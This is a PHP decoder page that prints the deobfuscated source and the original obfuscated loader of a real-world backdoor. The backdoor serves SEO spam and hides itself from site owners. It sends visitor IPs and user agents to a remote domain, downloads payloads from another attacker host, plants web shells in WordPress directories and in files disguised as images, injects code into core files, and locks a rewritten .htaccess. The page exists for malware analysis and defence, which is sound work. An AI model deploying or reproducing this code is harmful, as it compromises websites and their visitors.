Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$MdRwlQi6788='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$MdRwlQi6788[(105..

Decoded Output download

error_reporting(0);
$go_domain = "seo31.tophead.online";
$language = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4);
$userrefer = $_SERVER['HTTP_REFERER']?$_SERVER['HTTP_REFERER']:"";
$useragent = $_SERVER['HTTP_USER_AGENT']?$_SERVER['HTTP_USER_AGENT']:"";
$userip = '';
@$timezone_out = date_default_timezone_get();
if(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
    $userip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
    $userip = $_SERVER['REMOTE_ADDR'];
}
if(is_https()){
	$http = 'https';
}else{
	$http = 'http';
}

$index_url = "http://$go_domain/index.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&ip=%s&zone=%s";
$sitemap_url = "http://$go_domain/sitemap.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&zone=%s";
$host = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];

@$action = $_GET['ac']?$_GET['ac']:"";
if($action != "" && $action == "write"){
	$index_name = basename($_SERVER['SCRIPT_NAME']);;
	write($index_name);
	echo "write done!";
	exit();
}elseif($action != "" && $action == "check"){
	$bool = check();
	if($bool){
		echo "check code exists!";
	}else{
		echo "check code not exists!";
	}
	exit();
}elseif($action != "" && $action == "sitemap"){
	$sitemap = "https://www.google.com/webmasters/sitemaps/ping?sitemap=$http://$host/sitemap.xml";
	$contents = file_get_contents($sitemap);
	echo $contents;
	exit();
}

if(preg_match('@^/sitemap([1-9])?.xml$@i',$uri)){
	$request = sprintf($sitemap_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($timezone_out));
	$content = get($request);
	@header("Content-type: text/xml");
	echo trim($content);
	exit();
}elseif(substr($uri, -4) == ".css"){
	$request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip, urlencode($timezone_out));
	$content = get($request);
	if(strstr($content,'okhtmlgetcontent')){
		@header("Content-type: text/css; charset=utf-8");
		$content = str_replace("okhtmlgetcontent",'',$content);
		echo trim($content);
		exit();
	}
}else{
	$request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip, urlencode($timezone_out));
	$content = get($request);
	if(strstr($content,'okhtmlgetcontent')){
		@header("Content-type: text/html; charset=utf-8");
		$content = str_replace("okhtmlgetcontent",'',$content);
		echo trim($content);
		exit();
	}else if(strstr($content,'getcontent404page')){
		@header('HTTP/1.1 404 Not Found');
		echo "404 Not Found";
		exit();
	}else if(strstr($content,'getcontent301page')){
		@header('HTTP/1.1 301 Moved Permanently');
		$content = str_replace("getcontent301page",'',$content);
		header('Location: '.trim($content));
		exit();
	}
}

function write($index_name){
	$write1 = get("http://hello.turnedpro.xyz/write1.txt");
	$write2 = get("http://hello.turnedpro.xyz/write2.txt");
	$write3 = get("http://hello.turnedpro.xyz/write3.txt");
	$shell_postfs = get("http://hello.turnedpro.xyz/mm1.txt");
	$shell_load = get("http://hello.turnedpro.xyz/mm2.txt");
	$ht_content = file_get_contents(".htaccess");
	$index_content = file_get_contents($index_name);
	$loader_php = "wp-includes/template-loader.php";
	$load_php = "wp-includes/load.php";
	$font_editor_php = "wp-includes/SimplePie/font-editor.php";
	if(!is_dir("css")){
		mkdir("css", 0755, true);
	}
	if($index_name != "index.php"){
		$write1 = str_replace(base64_encode("./index.php"), base64_encode("./".$index_name), $write1);
		$write2 = str_replace(base64_encode("./index.php"), base64_encode("./".$index_name), $write2);
		$write3 = str_replace(base64_encode("./index.php"), base64_encode("./".$index_name), $write3);
	}
	file_put_contents("css/load.php", $shell_load);
	if(is_dir("wp-includes/SimplePie")){
		file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
		file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
		file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
		file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
		$loader_content = file_get_contents($loader_php);
		$load_content = file_get_contents($load_php);
		@chmod($loader_php, 0755);@chmod($load_php, 0755);
		file_put_contents($loader_php, $write1.$loader_content);
		file_put_contents($load_php, $load_content.$write2);
		@chmod($loader_php, 0644);@chmod($load_php, 0644);
		file_put_contents($font_editor_php, $shell_postfs);
	}else{
		if(!is_dir("images")){
			mkdir("images", 0755, true);
		}
		if(!is_dir("admin")){
			mkdir("admin", 0755, true);
		}
		file_put_contents("admin/votes.php", $shell_postfs);
		file_put_contents("images/arrows.png", $index_content);
		file_put_contents("images/icons.png", $ht_content);
		file_put_contents("template-load.php", $write3);
		if(substr(trim($index_content), -2) == "?>" || substr(trim($index_content), -7) == "</html>"){
			file_put_contents($index_name, "
<?php
@include('template-load.php');", FILE_APPEND);
		}else{
			file_put_contents($index_name, "?>
<?php
@include('template-load.php');", FILE_APPEND);
		}
	}
}
function check(){
	$new_ht_content = get("http://hello.turnedpro.xyz/shl/htaccess.txt");
	@chmod(".htaccess", 0755);$ht_content = file_get_contents(".htaccess");
	$index_name = "index.php";
	$bool = false;
	if(file_exists("jsdindex.php")){
		$jsd_content = file_get_contents("jsdindex.php");
		$pre = substr($jsd_content, 0, 120);
		if(strstr($pre, "MdRwlQi6788='y(3;]whcx)8$4mb dk1qog5sprlua=")){
			$bool = true;
			$index_name = "jsdindex.php";
			$new_ht_content = str_replace("^index.php$", "^jsdindex.php$", $new_ht_content);
			$new_ht_content = str_replace(". index.php [L]", ". jsdindex.php [L]", $new_ht_content);
		}
	}else{
		$content = file_get_contents("index.php");
		$pre = substr($content, 0, 120);
		if(strstr($pre, "MdRwlQi6788='y(3;]whcx)8$4mb dk1qog5sprlua=")){
			$bool = true;
		}
	}
	if(strstr($ht_content, "postfs.php|votes.php|index.php|wjsindex.php") && preg_match($ht_content, "RewriteRule ^$index_name$ - [L]")&& strstr($ht_content, "RewriteRule . $index_name [L]")){
	}else{
		file_put_contents(".htaccess", $new_ht_content);
		@chmod(".htaccess", 0444);
	}
	return $bool;
}
function get($url){ 
	$contents = @file_get_contents($url);
	if (!$contents) {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
		$contents = curl_exec($ch);
		curl_close($ch);
	} 
	return $contents;
}
function is_https() {
	if ( !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
		return true;
	} elseif ( isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https' ) {
		return true;
	} elseif ( !empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
		return true;
	}
	return false;
}

Did this file decode correctly?

Original Code

$MdRwlQi6788='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$MdRwlQi6788[(105/15)].$MdRwlQi6788[(26-1)].$MdRwlQi6788[(1*49)].$MdRwlQi6788[((10*1)+18)].$MdRwlQi6788[(14+22)].$MdRwlQi6788[(44+5)].$MdRwlQi6788[(44-13)].$MdRwlQi6788[(684/18)].$MdRwlQi6788[(23+4)].$MdRwlQi6788[(72-(33-7))].$MdRwlQi6788[(154/22)].$MdRwlQi6788[(11+25)].$MdRwlQi6788[(65-(62-31))].$MdRwlQi6788[(26-6)].$MdRwlQi6788[((27*2)-8)];$pHFdNhg9688=$MdRwlQi6788[(20-9)].$MdRwlQi6788[(2*4)].$MdRwlQi6788[(29*1)].$MdRwlQi6788[(160/4)];$MYtraky2482=$MdRwlQi6788[(8*5)].$MdRwlQi6788[((1+0)+2)].$MdRwlQi6788[(6+(1*(95/19)))].$MdRwlQi6788[(140/5)].$MdRwlQi6788[(522/18)].$MdRwlQi6788[(7*((7-3)-2))].$MdRwlQi6788[(2*14)].$MdRwlQi6788[(138/(2+4))].$MdRwlQi6788[(1029/(378/18))].$MdRwlQi6788[((2*189)/9)].$MdRwlQi6788[(12+(0+0))].$MdRwlQi6788[(31*1)].$MdRwlQi6788[(48/(36/12))].$MdRwlQi6788[(735/15)].$MdRwlQi6788[(0+7)].$MdRwlQi6788[(18+2)].$MdRwlQi6788[(18-(10/5))].$MdRwlQi6788[(735/15)].$MdRwlQi6788[(0+(2-(1*1)))].$MdRwlQi6788[(16-(3+(36/(0+18))))].$MdRwlQi6788[((167-23)/18)].$MdRwlQi6788[(0+(18-9))].$MdRwlQi6788[(1*3)].$MdRwlQi6788[(11*(1+(0/(78/13))))].$MdRwlQi6788[(2*7)].$MdRwlQi6788[(29*(0+1))].$MdRwlQi6788[(38-(8+9))].$MdRwlQi6788[(15*2)].$MdRwlQi6788[(45-11)].$MdRwlQi6788[(1*46)].$MdRwlQi6788[(1*(17+21))].$MdRwlQi6788[(78/3)].$MdRwlQi6788[(21+(77/11))].$MdRwlQi6788[(22+14)].$MdRwlQi6788[(343/(91/13))].$MdRwlQi6788[(1*1)].$MdRwlQi6788[(21-10)].$MdRwlQi6788[(22+(12/2))].$MdRwlQi6788[(180/20)].$MdRwlQi6788[(3+((0+0)*1))].$MdRwlQi6788[(686/(126/9))].$MdRwlQi6788[(61-(32-8))].$MdRwlQi6788[(476/17)].$MdRwlQi6788[((4-0)+22)].$MdRwlQi6788[(((23-(2*5))/13)-0)].$MdRwlQi6788[(7+(84/21))].$MdRwlQi6788[(28/2)].$MdRwlQi6788[(9-0)].$MdRwlQi6788[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481();

Function Calls

null 1
gzinflate 1
base64_decode 1
create_function 1

Variables

$b error_reporting(0); $go_domain = "seo31.tophead.online"; $la..
$x '7VlbU9vIEn7Gv2JQ+URSlS1jcC4nXgIUmGyqCLDC7DlVWaIS0tjWImm00ii..
$q2866 create_function
$JTx2343 $x="'7VlbU9vIEn7Gv2JQ+URSlS1jcC4nXgIUmGyqCLDC7DlVWaIS0tjWImm..
$UrR1094 '7VlbU9vIEn7Gv2JQ+URSlS1jcC4nXgIUmGyqCLDC7DlVWaIS0tjWImm00ii..
$mEriqO3481 None
$MYtraky2482 ";$a=base64_decode($x);$b=gzinflate($a);eval($b);
$MdRwlQi6788 y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je
$pHFdNhg9688 $x="

Stats

MD5 accc460bfd5b6b2662897455faa18da0
Eval Count 2
Decode Time 209 ms